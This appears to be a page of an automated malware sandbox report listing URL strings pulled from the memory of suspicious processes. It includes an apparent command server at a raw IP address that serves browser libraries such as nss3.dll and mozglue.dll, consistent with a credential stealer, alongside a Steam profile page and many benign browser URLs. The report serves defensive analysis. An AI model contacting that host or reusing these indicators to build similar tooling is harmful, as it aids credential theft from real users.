Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/#
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/.
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/8
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/H
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866839483.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/g
Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/k
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/l
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllao
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllk~c
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dllC~
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll7
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/r
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000052E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dll
Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dllYVj
Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.5908b543ef9ant-Disposition:
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000042E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59ECAE
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000060B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59JKFI
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59KKEH
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59a
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2042302155.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2040029267.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2037994793.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000002.00000000.2037244792.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.clo
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/pr
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
